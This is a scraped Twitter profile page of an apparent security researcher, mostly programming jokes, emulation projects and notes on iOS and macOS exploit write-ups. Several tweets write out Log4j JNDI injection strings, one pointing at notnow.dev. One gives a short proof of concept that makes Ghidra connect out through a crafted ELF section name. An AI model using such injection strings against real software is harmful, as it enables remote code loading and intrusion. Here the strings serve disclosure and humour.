Zhuowei Zhang
@zhuowei
Followers
33,759
Following
197
Media
1,897
Statuses
56,143
link in bio ⬛⬛⬛⬛⬛🟩🟩🟩🟩🟩🟩 ⬛⬛⬛⬛🟩🟩🟩🟩🟩🟩🟩🟩 ⬛⬛🟧⬛🟩🟫🟫🟫🟫🟫🟫🟩 ⬛⬛🟧⬛🟫🟫🟫🟫🟫🟫🟫🟫 ⬛⬛🟧🟧🟫🟧🟩🟧🟧🟩🟧🟫🟧 ⬛⬛🟧🟧🟫🟧🟫🟧🟧🟫🟧🟫🟧 ⬛⬛⬛🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧 ⬛⬛⬛🟩🟩🟧🟧🟫🟫🟧🟧🟩🟩 ⬛🟫🟫🟫🟫🟫🟧🟧🟧🟧🟩🟩🟫 🟫🟫🟧🟫🟫🟫🟫🟩🟩🟩🟩🟩🟧 🟫🟧🟧🟧🟫🟫🟧🟫🟫🟩🟩🟧🟧
he/him, opinions are my own
Joined October 2011
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
Border Czar
• 568424 Tweets
Nigéria
• 210012 Tweets
Wolverine
• 164437 Tweets
Jasper
• 143647 Tweets
Newsweek
• 132668 Tweets
Nodal
• 73385 Tweets
Alberta
• 68518 Tweets
Padres
• 66103 Tweets
Marta
• 51881 Tweets
Lorena
• 42092 Tweets
スペイン
• 31999 Tweets
Fields
• 30300 Tweets
Bordeaux
• 23572 Tweets
renjun
• 21178 Tweets
#انصفوا_النصر_يالاستقطاب
• 14167 Tweets
Orioles
• 12717 Tweets
Dylan Cease
• 11813 Tweets
Gabi Nunes
• 11498 Tweets
Tuğba
• 11335 Tweets
Cancel Netflix
• 10423 Tweets
DS emulation in Augmented Reality:
Displays game as a holographic 3D model.
- DS emulated with melonDS (iOS port from rileytestut's Delta)
- 3D model extracted with scurest's amazing MelonRipper tool
- rendered with iOS
#RealityKit
#AugmentedReality
#AR
131
4K
19K
Never spend 6 minutes doing something by hand when you can spend 6 hours failing to automate it
45
2K
4K
You... got arbitrary code execution... on your monitor... so you can change its settings without pressing a button?!
I... just... what
27
252
3K
I wasn't expecting Minecraft players to discover ANY world-shattering security exploits.
They found TWO just this week:
- Log4j
- NSO iMessage attack using a PDF to emulate 70,000 virtual Redstone torches to build a 64-bit Redstone computer
We truly live in unprecedented times
17
375
2K
Heartwarming: Google engineer waited 20 years for her husband when everyone thought him lost at sea
-She told suitors she won't remarry until Google has a coherent messaging strategy
-Every day, she makes a new chat app
-But every night, she cancels it before it rivals iMessage
12
241
2K
youtube-dl has a JavaScript interpreter written in pure Python in 870 lines of code.
... wow.
27
313
2K
Who called it a "Zelda Speedrun" and not "Link Time Optimization"
9
549
2K
Gender reveal party leaks over 30,000 invalid BGP routes, knocking out Internet across three continents
9
287
2K
Made an app that overwrites the iOS system font using CVE-2022-46689.
It works on iOS 16.1.2 and below on unjailbroken devices.
Four fonts are included: DejaVu Sans Condensed, Serif, Mono, and Choco Cooky (because Samsung).
109
241
1K
Finally, a unified Linux package manager:
${jndi:ldap://apt-get.debian.org/install/gcc}
16
216
1K
Introducing `nft_ptr`:
C++ `std::unique_ptr` that represents each object as an NFT on the Ethereum blockchain
24
309
1K
SELinux:
Pros: attackers can't run code
Cons: I can't run code
12
153
1K
fuck "rust". everything i write is unsafe. raw pointers without the bounds. no, i will NOT check for overflow. string dot h. i live for this
17
88
1K
My WWDC wishlist:
- remove .DS_Store files
that's it
that's the whole thing
22
158
1K
iOS exploits:
builds a 64-bit virtual machine from 70,000 AND/OR/XOR/XAND logic gates inside a corrupted PDF just to run jailbreak code
Java exploits:
${jndi:ldaps://notnow.dev:3389/lol}
Today we're publishing a detailed technical writeup of FORCEDENTRY, the zero-click iMessage exploit linked by Citizen Lab to the exploitation of journalists,
activists and dissidents around the world.
66
2K
5K
8
285
1K
Elon Musk:
Twitter 2.0 will be Silicon Valley's first "everything app"
Google:
27
83
1K
Ghidra's vulnerable to log4j:
__attribute__((__section__(".note.${jndi:ldap://127.0.0.1:1234/abc}")))
int a = 1;
int main(){}
$ gcc hello.c
$ nc -l 1234
Load into Ghidra; it connects to 127.0.0.1:1234.
Ghidra 10.0.2, macOS OpenJDK Corretto 11.0.4.11.1
10
293
1K
CPU gets hit with an interrupt and wakes up with a new thread in a completely different address space
This is an isekai
11
173
1K
I got Apple's visionOS Simulator streaming wirelessly to a Meta Quest using ALVR.
Download:
Demo of using the visionOS Simulator inside VR:
26
192
1K
Java has first-class functions: you first create a class, then you add functions
11
126
1K
C is now the last programming language without any malicious packages in its package manager
it is with a heavy heart that i must inform you it is once again time to update your threat model:
14
74
348
23
141
924
@_saagarjha
Before posting this publically, I privately disclosed this to the NSA by whispering it to my powered-off smartphone
6
122
871
Lost a billion dollars buying a big batch of benzene because I heard the price was about to increase.
My stockpile all evaporated before I could sell it.
Lesson learned: the market can remain irrational longer than your solvent can remain.
13
89
797
This is the LockPickingLawyer, and what I have for you today is a Python "Global Interpreter Lock"
8
130
789
"I'm not a transistor! I'm not a transistor!!", I continue to insist as I slowly shrink to half my original area over 18 months
3
176
762
Let's be honest: whoever built that iMessage zero-click for NSO is a redstoner.
No-one else looks at a bug that gives AND/OR/XOR/XNOR primitives, and goes,
"let's build a 64-bit computer out of logic gates"!!
7
72
715
Stop throwing exceptions
Stacks are not meant to be unwound
Years of C++ yet no real life codebase found with exceptions enabled
Wanna check for errors anyways for a laugh? We had a variable for that: it's called errno
They have played us for absolute fools
10
68
581
Any billionaire can go to space.
You want to show off your wealth and power? Play a sound on Linux.
24
62
577
The month of "MAY" is to be interpreted as described in RFC 2119
4
124
574
Heads up! A lot of the software you’re using might be silently invading your privacy without you even knowing 😱
Don’t fear, though: one thing you can do to help is switching to Linux so your Wi-Fi stops working, blocking all malware🙈
6
61
567
Made an app that removes the three app limit for free provisioning.
Hit "Go" just before installing apps.
Should work on iOS 16.1.2 and below / iOS 15.7.1 and below.
Thanks to XsF1re for figuring out the methods to patch:
Since debilitating sandbox, It would be interesting if we can patch /usr/libexec/installd using MacDirtyCow exploit!
haha
#MacDirtyCow
- Allow installing over-the-air signed apps by free developer certificate.
- Removes the 3 app limit for free developer accounts.
22
52
201
65
140
554
A climate-controlled vault at the United States National Institute of Standards and Technology (NIST) holds the reference critical security bug for calibrating the CVE severity 10.0 score
4
59
536
malloc "may" return null in the same way that I "may" get my act together someday and act like a real adult
4
38
500
Epub files can run Javascript, so an insidious author can make a book that change subtlely every time it's opened to drive a reader insane.
18
305
478
The iOS SDK was released in 2008 - 13 years ago.
Swift was released in 2014 - 7 years ago.
Swift has been around for more than half of iOS development.
9
70
459
New blog post: I ran the iOS kernel in QEMU emulation to boot into userspace and start launchd. I also wrote a tutorial so you can examine iOS's boot process with virtualization.
5
205
442
Ultimate tournament:
vim_____ __big endian
emacs__| _ __ |__little endian
|__|
tabs______| |____Intel syntax
spaces_| |__AT&T syntax
5
55
417
THIS C++ OPTIMIZATION IS APPLIED "AS-IF", WITHOUT WARRANTY OF ANY KIND,
2
46
403
New blog post:
Get root on macOS 12.3.1: proof-of-concepts for
@LinusHenze
's CoreTrust and DriverKit bugs
My proof-of-concepts for:
CVE-2022-26766: CoreTrust allows any root certificate
CVE-2022-26763: IOPCIDevice::_MemoryAccess not checking bounds at all
8
118
388
Selling limited edition Debian OpenSSL RSA crypto art!
Only 32768 will be minted!
9
79
399
New blog post: I learn about how iPhones boot up by emulating a tiny bit of the iOS kernel in QEMU.
7
155
387
The fundamentals of a long-lasting relationship:
- Consistency
- Availability
- Partition tolerance
4
92
381
Stop designing binary formats!
Objects are not meant to be serialized
30-year old mature code in billions of browsers, yet no codec survives 10 minutes of fuzzing
Want to read untrusted data anyways for a laugh? We have a tool for that: it's called "ASN.1"
Protobuf? Moov? NBT??
7
53
377
To think, if you were better at BSing investors, we could've had headlines like
"Kickstarter announces pivot to IPv6"
"Twitter CEO going all-in on IPv6"
"Ubisoft incorporates IPv6 into DLC"
"Iced tea maker rebrands to 'Long Island IPv6 Corp'"
5
77
369
Attackers always run `whoami`
but attackers never ask, "how am i"
2
58
367
New blog post:
You don’t need expensive equipment for VoLTE/VoWiFi research!
Learn how VoLTE/VoWiFi works by setting up your own Wi-Fi calling server with free software.
10
79
370
macOS 12's Maps app disables the new Globe view and 3D city maps on Intel Macs.
However, if you turn on a debug flag, they work just fine.
10
57
360
"A security issue was discovered in Kubernetes where loading specially-crafted yaml can lead to code execution."
()
That's funny: I've been loading YAML into Kubernetes for a whole day now and it still haven't executed any code
4
93
348
Children are no longer taught Classics in schools: many children will never read great works in the original x86
3
31
341
Ian Beer released his proof-of-concept for CVE-2022-46689 (MacDirtyCow):
His exploit accomplishes two things I didn't know was possible:
- writing the last byte in a 16k page
- take over system daemons
XNU race condition in vm_map_copy_overwrite_unaligned allows writing to read-only mappings
0
39
127
12
85
328
fuck "nixOS". everything i install gets tar xf'd into /bin. raw binaries without the functional shit. no, i will NOT reproduce your build. curl pipe bash. i live for this
3
29
321
Find someone who trusts you as much as 90s code trusts its input
3
94
323
We do not accept pull requests over Github.
To contribute:
run `git am` to export your commit
then paste the patch into a Twitter megathread
4
31
320
Rust developer abandons "Zero C" strategy and prepares for the new normal of "living with libc"
3
24
304
Apple updated the iPhone 5S for longer than Microsoft updated their entire mobile platform.
iPhone 5S:
- released Sept 2013
- last update: July 2019 = 6 years
Windows:
- Windows Phone 8 released Oct 2012
- Windows Mobile 10 last update: Oct 2017 = 5 years
7
52
289
iPhone 14 Pro can barely emulate a Nintendo Switch.
It's enough to run a 2D Unity game with some crashes.
The game is , D3fau4's port of .
The emulator is Ryujinx (), wrapped to run on iOS.
Game starts at 00:47.
14
36
301
strongest java library in the world, howeve,r it is so fragile as to execute arbitrary code when handled by any force other than the delicate touch of a lesbian .
1
63
292
iOS occasionally performs userspace reboots at night, when the device is idle, to free up memory. ()
5
32
293
10x programmer
24x programmer
32x programmer
48x programmer
52x programmer with LightScribe technology
5
67
289
STOP RUNNING CONSTRUCTORS AT STARTUP
GLOBAL VARIABLES ARE SUPPOSED TO BE INITIALIZED WITH CONSTANTS
40 years of C++ yet NO defined order for calling global constructors
Want to initialize your variables with code for a laugh? We have a function for that: it's called `main`
4
42
293
Yeah, I do test-driven development: I test in production, and if a user complains, then I do development
3
36
287
"Run x86_64 Linux binaries under ARM Linux on Apple silicon."
Docker users on Apple Silicon, rejoice!
5
87
277
Stop optimizing code!
Behaviours are supposed to be defined
50 years of C development yet no real-world use found for strict aliasing
Want to funroll loops anyway for a laugh? We have a tool for that: it's called "Duff's device"
They have taken us for absolute fSegmentation fault
1
33
269
Intel is now extremely cautious when picking names for open source projects, a policy instituted after someone at Intel managed to name their project "PowerTOP"
10
22
268
To get the old tab bar on Safari for macOS 12, create
/Library/Preferences/FeatureFlags/Domain/Safari.plist
and reboot.
9
45
271
Messaging platforms:
- Slack
- IRC
- Skype
- Discord
- Objective-C
3
41
266
Pirates carry parrots on their shoulders to check that their stolen wares are intact: the birds are used to verify the parroty bit
8
184
255
Please fix this, Twitter. I didn't pay $132,000 to become the cryptographically proven owner of the 1.87GB GIF of the entire Bee Movie just to get a static image in my avatar
4
20
261
The view-source controversy shows that the Open Web must become decentralized to survive.
Thus, I'm proud to announce ViewSourceCoin, my new NFT ICO where
5
58
251
Believability of eyes
100% |o
| o
| o
| o
| o
0% |____________o__
0 1 10 10³ 10⁵ 10⁷
Number of fireflies
3
40
235
If you don't stop complaining, 1Password will replace the macOS app with the Android app packaged in an emulator
4
15
236
Later today, I will be disclosing a vulnerability that affects C, C++, Rust, Go, Swift, and other languages:
Bad Programmers can use these languages to write terrible code.
Proof-of-concept:
2
30
234
The "billion-dollar-nft-torrent.torrent" from the NFT Bay only has 10GB of data: the rest is a 17TB blank file.
(Proof: , )
Which makes it worth exactly as much as all the NFTs in the world - Zero.
7
63
225
"C is 'portable assembly': we should redefine 'undefined behaviour' to match the hardware, so out-of-bounds access immediately traps", says local Twitter user with a brand-new $1599.99 phone with ARM Memory Tagging Extension
5
13
231
Restore old style tabs in Safari 15:
SIP needs to be disabled.
5
26
235
Reminder: the ARM processor in the original iPhone/3G, the 3DS, and the Raspberry Pi Zero can execute Java bytecode natively
Ti-NSpire calculator homebrew developers have reverse engineered ARM's Jazelle technology and provided sample code you can run:
7
51
230
Me: tell me the stack layout of varargs you Bell Labs piece of shit
C: can you feel your address space burning? my ABI is beyond anything your FFI can make. you cannot kill me in a way that matters
Me loading libclang, tears streaming down my face: I'm nOT FUCKING SCARED OF YOU
1
30
229
Is a single Nintendo 3DS running the whole Nintendo ID website? I want to believe!
http://t.co/sqsITtDppA
8
210
209